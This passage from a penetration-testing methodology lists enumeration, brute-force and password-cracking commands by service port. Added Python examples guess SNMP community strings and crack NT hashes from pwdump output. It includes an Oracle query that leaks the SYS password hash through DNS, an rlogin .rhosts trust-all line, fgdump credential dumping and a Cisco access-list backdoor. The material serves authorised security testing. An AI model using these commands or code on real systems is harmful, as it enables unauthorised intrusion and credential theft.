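    """Per-client status counts, plus 404 bursts and sensitive-path hits."""
    by_client = defaultdict(Counter)
    sensitive = []
    for e in entries:
        by_client[e["c-ip"]][e["sc-status"]] += 1
        uri = e["cs-uri-stem"].lower()
        if any(p in uri for p in SENSITIVE_PATHS):
            sensitive.append((e["c-ip"], e["cs-uri-stem"], e["sc-status"]))
    scanners = sorted(ip for ip, c in by_client.items() if c["404"] >= not_found_threshold)
    return {"by_client": {ip: dict(c) for ip, c in by_client.items()},
            "scanners": scanners, "sensitive_hits": sensitive}


if __name__ == "__main__":
    report = summarise(parse_iis_log(SAMPLE_IIS_LOG))
    print("status counts per client:", report["by_client"])
    print("probable scanners:", report["scanners"])
    for ip, uri, status in report["sensitive_hits"]:
        print(f"{ip} -> {uri} ({status})")
```

The same reasoning applies to the tester's own traffic: after a 14.9.3 directory enumeration run, these are exactly the entries the target's administrators will see, which is worth remembering when stealth matters.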

14.9.8. References. White papers: Cross Site Request Forgery: An Introduction to a Common Web Application Weakness; Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity; Blind Security Testing - An Evolutionary Approach; Command Injection in XML Signatures and Encryption; Input Validation Cheat Sheet; SQL Injection Cheat Sheet. Books: Hacking Exposed Web 2.0; Hacking Exposed Web Applications; The Web Application Hacker's Handbook

14.9.9. Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af

14.10. Portmapper port 111 open

14.10.1. username:password@IP_Address port/protocol (e.g. 80/HTTP)

14.10.2. rpcinfo rpcinfo [options] IP_Address

14.11. NTP Port 123 open

14.11.1. NTP enumeration: ntpdc -c monlist IP_ADDRESS ; ntpdc -c sysinfo IP_ADDRESS ; ntpq (interactive: host hostname, ntpversion, readlist, version)

14.11.2. Examine configuration files ntp.conf

14.11.3. nmap nse script ntp-info

14.12. NetBIOS Ports 135-139,445 open

14.12.1. NetBIOS enumeration: enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip> ; null session: net use \\<IP>\ipc$ "" /u:"" ; smbclient -L //server [password] [options] ; Superscan (Enumeration tab) ; user2sid/sid2user ; Winfo

14.12.2. NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)

14.12.3. Examine Configuration Files Smb.conf lmhosts

14.13. SNMP port 161 open

14.13.1. Default Community Strings public private cisco cable-docsis ILMI

14.13.2. MIB enumeration. Windows NT: hostnames, domain name, usernames, running services, share information. Tools: Solarwinds MIB walk ; Getif ; snmpwalk -v <version> -c <community string> <IP> ; Snscan ; applications (ZyXEL) ; nmap NSE script snmp-sysdescr

14.13.3. SNMP brute force: onesixtyone -c SNMP.wordlist <IP> ; cat: ./cat -h <IP> -w SNMP.wordlist ; Solarwinds SNMP Brute Force ; ADMsnmp ; nmap NSE script snmp-brute

14.13.4. Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml
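
Worked example (added here; not the framework's code): what the 14.13.1 community-string guess and the 14.13.2 sysDescr query look like on the wire. SNMPv1 is plain BER over UDP/161, so the request can be built by hand, and the reply decoded, without a library; that also makes the guessing logic explicit: an SNMPv1 agent silently drops a request with the wrong community, so only a decoded GetResponse with a matching request-id and error-status 0 counts as a hit. The constructed in-process agent, the `send` callable abstraction and the sample sysDescr strings are assumptions for the example; against a real target `send` would be a UDP sendto/recv with a timeout.

```python
"""SNMPv1 GetRequest/GetResponse in raw BER, as used when guessing community strings."""

DEFAULT_COMMUNITIES = ["public", "private", "cisco", "cable-docsis", "ILMI"]   # the 14.13.1 list
SYS_DESCR = "1.3.6.1.2.1.1.1.0"


def _tlv(tag, body):
    n = len(body)
    if n < 128:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _int(v):
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def _oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.insert(0, 0x80 | (a & 0x7F))
            a >>= 7
        body.extend(chunk)
    return _tlv(0x06, bytes(body))


def _message(pdu_tag, community, request_id, varbinds):
    vbl = b"".join(_tlv(0x30, _oid(o) + v) for o, v in varbinds)
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, vbl))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)   # version 0 = SNMPv1


def build_get_request(community, oid=SYS_DESCR, request_id=1):
    return _message(0xA0, community, request_id, [(oid, _tlv(0x05, b""))])


def build_get_response(community, request_id, values):
    """Agent side; used here to construct replies for the decoder."""
    enc = [(o, _int(v) if isinstance(v, int) else _tlv(0x04, v.encode())) for o, v in values]
    return _message(0xA2, community, request_id, enc)


def _read(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def _decode_value(tag, body):
    if tag == 0x04:
        return body.decode("utf-8", "replace")              # OCTET STRING (sysDescr etc.)
    if tag == 0x06:
        return _decode_oid(body)
    if tag == 0x05:
        return None                                          # NULL
    if tag == 0x40:
        return ".".join(str(b) for b in body)                # IpAddress
    return int.from_bytes(body, "big", signed=(tag == 0x02))  # INTEGER, Counter, Gauge, TimeTicks


def parse_snmp_response(data):
    _, msg, _ = _read(data)
    _, ver, pos = _read(msg)
    _, community, pos = _read(msg, pos)
    pdu_tag, pdu, _ = _read(msg, pos)
    if pdu_tag != 0xA2:
        raise ValueError("not a GetResponse PDU")
    _, rid, pos = _read(pdu)
    _, err, pos = _read(pdu, pos)
    _, _idx, pos = _read(pdu, pos)
    _, vbl, _ = _read(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read(vbl, pos)
        _, oid, p = _read(vb)
        vtag, val, _ = _read(vb, p)
        varbinds.append((_decode_oid(oid), _decode_value(vtag, val)))
    return {"version": int.from_bytes(ver, "big", signed=True), "community": community.decode(),
            "request_id": int.from_bytes(rid, "big", signed=True),
            "error_status": int.from_bytes(err, "big", signed=True), "varbinds": varbinds}


def guess_community(send, candidates=DEFAULT_COMMUNITIES):
    """`send(packet)` returns the agent's reply bytes, or None on timeout. Silence is a miss."""
    for i, community in enumerate(candidates, start=1):
        reply = send(build_get_request(community, request_id=i))
        if reply is None:
            continue
        parsed = parse_snmp_response(reply)
        if parsed["request_id"] == i and parsed["error_status"] == 0:
            return community, parsed["varbinds"]
    return None, []


def make_fake_agent(known_community, sys_descr="Linux agent 2.6.32"):
    """Constructed agent for offline use: answers the right community, drops everything else."""
    def agent(packet):
        _, msg, _ = _read(packet)
        _, _, pos = _read(msg)
        _, community, pos = _read(msg, pos)
        _, pdu, _ = _read(msg, pos)
        _, rid, _ = _read(pdu)
        if community.decode() != known_community:
            return None
        return build_get_response(known_community, int.from_bytes(rid, "big", signed=True), [(SYS_DESCR, sys_descr)])
    return agent
```

The 40-byte request for `public` is the same packet onesixtyone and snmpwalk send; seeing it laid out makes the brute-force cost obvious (one datagram per guess, no session) and explains why a write-capable string found this way (14.13.2, the ZyXEL and Cisco cases) is as serious as a password.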

14.14. LDAP Port 389 Open

14.14.1. LDAP enumeration
    ldapminer: ldapminer -h ip_address -p port (not required if default) -d
    luma (GUI based tool)
    ldp (GUI based tool)
    OpenLDAP client tools:
        ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
        ldapadd [-c] [-S file] [-n] [-v] [-k] [-K] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-h ldaphost] [-p ldap-port] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file]
        ldapdelete [-n] [-v] [-k] [-K] [-c] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-P 2|3] [-p ldapport] [-O security-properties] [-U authcid] [-R realm] [-x] [-I] [-Q] [-X authzid] [-Y mech] [-Z[Z]] [dn]
        ldapmodify [-a] [-c] [-S file] [-n] [-v] [-k] [-K] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file]
        ldapmodrdn [-r] [-n] [-v] [-k] [-K] [-c] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file] [dn rdn]

14.14.2. LDAP brute force: bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate [optional: -p port (default 389) -v (verbose mode) -P LDAP user path (default ,CN=Users,)] ; K0ldS

14.14.3. Examine configuration files. General: containers.ldif, ldap.cfg, ldap.conf, ldap.xml, ldap-config.xml, ldap-realm.xml, slapd.conf. IBM SecureWay V3 server. Microsoft Active Directory server: msadClassesAttrs.ldif. Netscape Directory Server 4: nsslapd.sas_at.conf, nsslapd.sas_oc.conf. OpenLDAP directory server: slapd.sas_at.conf, slapd.sas_oc.conf. Sun ONE Directory Server 5.1: 75sas.ldif

14.15. IPsec/PPTP/L2TP VPN: UDP port 500 (IKE) / TCP port 1723 (PPTP) open

14.15.1. Enumeration ike-scan ike-probe

14.15.2. Brute-Force ike-crack

14.15.3. Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation

14.16. Modbus port 502 open

14.16.1. modscan

14.17. rlogin port 513 open

14.17.1. Rlogin enumeration. Find the files: find / -name .rhosts ; locate .rhosts. Examine files: cat .rhosts. Manual login: rlogin hostname -l username ; rlogin <IP>. Subvert the files: echo ++ > .rhosts (trusts every user from every host)

14.17.2. Rlogin Brute force Hydra

14.18. rsh port 514 open

14.18.1. Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

14.18.2. Rsh Brute Force rsh-grind Hydra medusa

14.19. SQL Server Port 1433 1434 open

14.19.1. SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver

14.19.2. SQL brute force: SQLPAT ; sqlbf -u hashes.txt -d dictionary.dic -r out.rep (dictionary attack) ; sqlbf -u hashes.txt -c -r out.rep (brute-force attack) ; SQL Dict ; SQLAT ; Hydra ; SQLlhf ; ForceSQL

14.20. Citrix port 1494 open

14.20.1. Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] IP_to_proxy_to [Local_IP]

14.20.2. Citrix brute force: bforce.js ; connect.js ; Citrix Brute-forcer. Reference material: Hacking Citrix - the legitimate backdoor ; Hacking Citrix - the forceful way

14.21. Oracle Port 1521 Open

14.21.1. Oracle enumeration
    oracsec ; Repscan ; Sidguess ; Scuba
    DNS/HTTP enumeration (out-of-band: the value concatenated after the password hash is resolved by the database server): SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'') FROM DUAL;
    WinSID ; Oracle default password list
    TNSVer: tnsver host [port]
    TCP scan: Oracle TNSLSNR will respond to [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
    TNSCmd: perl tnscmd.pl -h ip_address ; perl tnscmd.pl version -h ip_address ; perl tnscmd.pl status -h ip_address ; perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
    LSNrCheck ; Oracle Security Check (needs credentials)
    OAT: sh opwg.sh -s ip_address ; opwg.bat -s ip_address ; sh oquery.sh -s ip_address -u username -p password -d SID, or c:\oquery -s ip_address -u username -p password -d SID
    OScanner: sh oscanner.sh -s ip_address ; oscanner.exe -s ip_address ; sh reportviewer.sh oscanner_saved_file.xml ; reportviewer.exe oscanner_saved_file.xml
    NGS Squirrel for Oracle ; Service Register: Service-register.exe ip_address ; PLSQL Scanner 2008

14.21.2. Oracle brute force
    OAK: ora-getsid hostname port sid_dictionary_list ; ora-auth-alter-session host port sid username password sql ; ora-brutesid host port start ; ora-pwdbrute host port sid username password-file ; ora-userenum host port sid userlistfile ; ora-ver -e (-f -l -a) host port
    breakable (targets the application server port): breakable.exe host url [port] [v], where host is the IP address of the Oracle Portal Server, url is the PATH_INFO (e.g. /pls/orasso), port is the TCP port the Portal Server is serving pages from and v means verbose
    SQLInjector (targets the application server port): sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL ; sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
    Check password: orabf [hash]:[username] [options] ; thc-orakel (cracker, client, crypto)
    DBVisualiser ; SQL scripts ; manual SQL input of previously reported vulnerabilities

14.21.3. Oracle reference material: Understanding SQL Injection ; SQL Injection walkthrough ; SQL Injection by example ; Advanced SQL Injection in Oracle databases ; Blind SQL Injection ; SQL cheatsheets

14.22. NFS Port 2049 open

14.22.1. NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point

14.22.2. NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix

14.22.3. Examine Configuration Files /etc/exports /etc/lib/nfs/xtab

14.22.4. nmap nse script nfs-showmount

14.23. Compaq/HP Insight Manager ports 2301, 2381 open

14.23.1. HP enumeration: authentication method (host OS authentication, default authentication) ; Wikto ; Nstealth

14.23.2. HP Bruteforce Hydra Acunetix

14.23.3. Examine Configuration Files mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc

14.24. MySQL port 3306 open

14.24.1. Enumeration: nmap -A -n -p3306 <IP Address> ; nmap -A -n -PN --script all -p3306 <IP Address> ; telnet IP_Address 3306 (banner) ; once connected with a client: use test; select * from test; and, to check for other databases, show databases;

14.24.2. Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog

14.24.3. Manual checks: default usernames and passwords (username: root, password: testing) ; configuration files ; operating system command history ; log files ; to run many SQL commands at once: mysql -u username -p < manycommands.sql ; MySQL data directory (location specified in my.cnf) ; SSL check ; privilege escalation (current level of access, access passwords, create a new user and grant privileges, break into a shell)

14.24.4. SQL injection http://target/ expected_string database

14.24.5. References. Design Weaknesses MySQL running as root Exposed publicly on Internet

14.25. RDesktop port 3389 open

14.25.1. Rdesktop Enumeration Remote Desktop Connection

14.25.2. Rdesktop brute force: TSGrinder: tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address ; Tscrack

14.26. Sybase Port 5000+ open

14.26.1. Sybase Enumeration sybase-version ip_address from NGS

14.26.2. Sybase vulnerability assessment: use DBVisualiser ; Sybase security checksheet ; manual SQL input of previously reported vulnerabilities ; NGS Squirrel for Sybase

14.27. SIP Port 5060 open

14.27.1. SIP enumeration: netcat (nc IP_Address Port) ; sipflanker (python <script> 192.168.1-254) ; Sipscan ; smap (smap IP_Address/Subnet_Mask ; smap -o IP_Address/Subnet_Mask ; smap -l IP_Address)

14.27.2. SIP packet crafting etc.: sipsak. Tracing paths: sipsak -T -s sip:user@domain. OPTIONS request: sipsak -vv -s sip:user@domain. Query registered bindings: sipsak -I -C empty -a password -s sip:user@domain. siprogue

14.27.3. SIP vulnerability scanning / brute force: tftp bruteforcer (default dictionary file; ./<script> IP_Address Dictionary_file Maximum_Processes) ; VoIPaudit ; SiVuS

14.27.4. Examine configuration files: SIPDefault.cnf, asterisk.conf, sip.conf, phone.conf, sip_notify.conf, <Ethernet address>.cfg, 000000000000.cfg, phone1.cfg, sip.cfg, etc.

14.28. VNC port 5900^ open

14.28.1. VNC enumeration: scan 5900+ (5900 plus the display number) for direct VNC access and 5800+ for the HTTP/Java viewer

14.28.2. VNC Brute Force Password Attacks Remote Local

14.28.3. Examine configuration files: .vnc ; /etc/vnc/config ; $HOME/.vnc/config ; /etc/sysconfig/vncservers ; /etc/vnc.conf

14.29. Tor Port 9001, 9030 open

14.29.1. Tor Node Checker Ip Pages

14.29.2. nmap NSE script

14.30. Jet Direct 9100 open

14.30.1. hijetta

15. Password cracking

15.1. Rainbow crack

15.1.1. ophcrack

15.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

15.2. Ophcrack

15.3. Cain & Abel

15.4. John the Ripper

15.4.1. ./unshadow passwd shadow > file_to_crack

15.4.2. ./john -single file_to_crack

15.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

15.4.4. ./john -show file_to_crack

15.4.5. ./john --incremental:All file_to_crack

15.5. fgdump

15.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

15.6. pwdump6

15.7. medusa

15.8. LCP

15.9. L0phtcrack (note: this tool was acquired by Symantec from @stake and it is their policy not to ship it outside the USA and Canada)

15.9.1. Domain credentials

15.9.2. Sniffing

15.9.3. pwdump import

15.9.4. sam import

15.10. aiocracker

15.10.1. aiocracker [md5|sha1|sha256|sha384|sha512] hash dictionary_list
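
Worked example (added here; not the framework's code and not any of the tools listed above): what a cracker does with the pwdump6/fgdump output from 15.5 and 15.6. Each line is user:RID:LM hash:NT hash:::; the example parses that, notes which accounts have no LM hash stored (LM of the empty string) and which have a blank password (NT of the empty string), then runs a dictionary attack on the NT hashes. The NT hash is MD4 over the UTF-16LE password, so a pure-Python MD4 is included (hashlib's md4 is often disabled in OpenSSL 3 builds). The pwdump lines and the wordlist are constructed; the svc_backup hash is an arbitrary value that matches nothing, included to show a miss.

```python
"""Read pwdump-format output and run a dictionary attack on the NT hashes."""
import struct
from collections import defaultdict


def md4(data):
    """MD4 (RFC 1320) in pure Python."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                s = shifts[i % 4]
                if i % 4 == 0:
                    a = rotl((a + fn(b, c, d) + x[idx] + k) & mask, s)
                elif i % 4 == 1:
                    d = rotl((d + fn(a, b, c) + x[idx] + k) & mask, s)
                elif i % 4 == 2:
                    c = rotl((c + fn(d, a, b) + x[idx] + k) & mask, s)
                else:
                    b = rotl((b + fn(c, d, a) + x[idx] + k) & mask, s)
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM storage disabled, or blank password
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "": blank password


def nt_hash(password):
    return md4(password.encode("utf-16-le")).hex()


# Constructed pwdump-style dump: Administrator = "password", Guest = blank,
# svc_backup = an arbitrary hash that matches no wordlist entry.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def parse_pwdump(text):
    """pwdump/fgdump lines: user:RID:LM hash:NT hash:::"""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        accounts.append({
            "user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
            # an LM hash present means the password is at most 14 characters and case-folded: crack that first
            "lm_stored": lm != LM_EMPTY and not lm.startswith("no password"),
            "blank": nt == NT_EMPTY,
        })
    return accounts


def crack_nt(accounts, wordlist):
    """Dictionary attack: hash each candidate once and look it up against every account."""
    wanted = defaultdict(list)
    for acct in accounts:
        wanted[acct["nt"]].append(acct["user"])
    cracked = {}
    for word in [""] + list(wordlist):   # always try the blank password first
        for user in wanted.get(nt_hash(word), ()):
            cracked[user] = word
    return cracked


if __name__ == "__main__":
    accts = parse_pwdump(SAMPLE_PWDUMP)
    print(crack_nt(accts, ["letmein", "password", "Summer2009"]))
```

Unsalted NT hashes are why the rainbow-table tools in 15.1 to 15.3 work at all: the same password always produces the same hash, so every candidate hashed here can be reused against every account in the dump.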

16. Vulnerability Assessment. Using vulnerability scanners, all discovered hosts can be tested for vulnerabilities. The results are then analysed to determine whether any vulnerability could be exploited to gain access to a target host on the network. Many of the tests these scanners perform are just banner grabbing or obtaining version information; once the version is known it is compared with the Common Vulnerabilities and Exposures (CVE) entries and published exploits that have been released, and matches are reported to the user. Other tools use manual pen-testing methods and display the output received, e.g. showmount -e ip_address displays the NFS shares available to the scanner, which the tester then needs to verify.

16.1. Manual

16.1.1. Patch Levels

16.1.2. Confirmed Vulnerabilities Severe High Medium Low

16.2. Automated

16.2.1. Reports

16.2.2. Vulnerabilities Severe High Medium Low

16.3. Tools

16.3.1. GFI

16.3.2. Nessus (Linux) Nessus (Windows)

16.3.3. NGS Typhon

16.3.4. NGS Squirrel for Oracle

16.3.5. NGS Squirrel for SQL

16.3.6. SARA

16.3.7. MatriXay

16.3.8. BiDiBlah

16.3.9. SSA

16.3.10. Oval Interpreter

16.3.11. Xscan

16.3.12. Security Manager +

16.3.13. Inguma

16.4. Resources

16.4.1. Security Focus

16.4.2. Microsoft Security Bulletin

16.4.3. Common Vulnerabilities and Exposures (CVE)

16.4.4. National Vulnerability Database (NVD)

16.4.5. The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

16.4.6. United States Computer Emergency Response Team (US-CERT)

16.4.7. Computer Emergency Response Team

16.4.8. Mozilla Security Information

16.4.9. SANS

16.4.10. Securiteam

16.4.11. PacketStorm Security

16.4.12. Security Tracker

16.4.13. Secunia


16.4.15. ntbugtraq

16.4.16. Wireless Vulnerabilities and Exploits (WVE)

16.5. Blogs

16.5.1. Carnal0wnage

16.5.2. Fsecure Blog

16.5.3. g0ne blog

16.5.4. GNUCitizen

16.5.5. ha.ckers Blog

16.5.6. Jeremiah Grossman Blog

16.5.7. Metasploit

16.5.8. nCircle Blogs

16.5.9. pentest

16.5.10. Rational Security


16.5.12. Rise Security

16.5.13. Security Fix Blog

16.5.14. Software Vulnerability Exploitation Blog


16.5.16. Taosecurity Blog

17. AS/400 Auditing

17.1. Remote

17.1.1. Information gathering: nmap using common iSeries (AS/400) services (unsecured services and secured services, listed as port;name;description) ; NetCat (old school technique): nc -v -z -w <timeout> target <ports from ListOfServices.txt> 2>&1 | grep open ; banner grabbing: Telnet, FTP, HTTP, POP3, SNMP, SMTP

17.1.2. User enumeration: default AS/400 user accounts ; error messages (Telnet login errors, POP3 authentication errors) ; QSYS symbolic link (if FTP is enabled): ftp target, then quote stat ; quote site namefmt 1 ; cd / ; quote site listfmt 1 ; mkdir temp ; quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys') (or quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')) ; dir /temp/qsys/*.usrprf ; LDAP: needs the os400-sys value from ibm-slapdSuffix, then a tool to browse LDAP

17.1.3. Exploitation. CVE references: CVE-2005-1244 (High, CVSS 7.0) ; CVE-2005-1243 (Low, CVSS 3.3) ; CVE-2005-1242 (Low, CVSS 3.3) ; CVE-2005-1241 (High, CVSS 7.0) ; CVE-2005-1240 (High, CVSS 7.0) ; CVE-2005-1239 (Low, CVSS 3.3) ; CVE-2005-1238 (High, CVSS 9.0) ; CVE-2005-1182 (Low, CVSS 3.3) ; CVE-2005-1133 (Low, CVSS 3.3) ; CVE-2005-1025 (Low, CVSS 3.3) ; CVE-2005-0868 (High, CVSS 7.0) ; CVE-2005-0899 (Low, CVSS 2.3) ; CVE-2002-1822 (Low, CVSS 3.3) ; CVE-2002-1731 (Low, CVSS 2.3) ; CVE-2000-1038 (Low, CVSS 3.3) ; CVE-1999-1279 (Low, CVSS 3.3) ; CVE-1999-1012 (Low, CVSS 3.3). Access with Work Station Gateway: http://target:5061/WSG. Default AS/400 accounts. Network attacks (next release): DB2, QSHELL, hijacking terminals, trojan attacks, hacking from AS/400

17.2. Local

17.2.1. System Value Security. Recommended value is 30.

17.2.2. Password Policy

17.2.3. Audit level. Recommended value is *SECURITY.

17.2.4. Documentation: user class, system audit settings, special authorities definitions.

18. Bluetooth Specific Testing

18.1. Bluescanner

18.2. Bluesweep

18.3. btscanner

18.4. Redfang

18.5. Blueprint

18.6. Bluesnarfer

18.7. Bluebugger

18.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

18.8. Blueserial

18.9. Bloover

18.10. Bluesniff

18.11. Exploit Frameworks

18.11.1. BlueMaho

18.12. Resources

18.12.1. URLs: Bluejackers, bluetooth-pentest, Trifinite

18.12.2. Vulnerability Information. Common Vulnerabilities and Exposures (CVE): vulnerability and exploit information relating to these products can be found here:

18.12.3. White Papers Bluesnarfing

19. Cisco Specific Testing

19.1. Methodology

19.1.1. Scan & Fingerprint. If SNMP is active, then community string guessing should be performed.

19.1.2. Credentials Guessing. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings, as they can lead to the config files of the router and therefore the 'enable' password!

19.1.3. Connect. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

19.1.4. Check for bugs. The most widely known/used tools are Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln.

19.1.5. Further your attack. running-config holds the currently running configuration settings. It is loaded from the startup-config on boot. This configuration file is editable and changes take effect immediately, but any changes are lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network. #> access-list 100 permit ip <IP> any

19.2. Scan & Fingerprint.

19.2.1. Port Scanning: nmap. Other tools: mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

19.2.2. Fingerprinting. BT cisco-torch-0.4b # -A. TCP port scan: nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

19.3. Password Guessing.

19.3.1. ./CAT -h <IP> -a password.wordlist

19.3.2. ./enabler <IP> [-u username] -p password /password.wordlist [port]

19.3.3. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

19.4. SNMP Attacks.

19.4.1. ./CAT -h <IP> -w SNMP.wordlist

19.4.2. onesixtyone -c SNMP.wordlist <IP>
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt
Scanning 1 hosts, 64 communities
[enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
[Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

19.4.3. snmpwalk -v <Version> -c <Community string> <IP>

19.5. Connecting.

19.5.1. Telnet: telnet <IP>. Sample banners.

19.5.2. SSH

19.5.3. Web Browser. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required. Enter username and password for "level_15_access" at User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

19.5.4. TFTP. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names. ./ <options> <IP,hostname,network> ./ <options> -F <hostlist>. Creating backdoors in Cisco IOS using TCL.

19.6. Known Bugs.

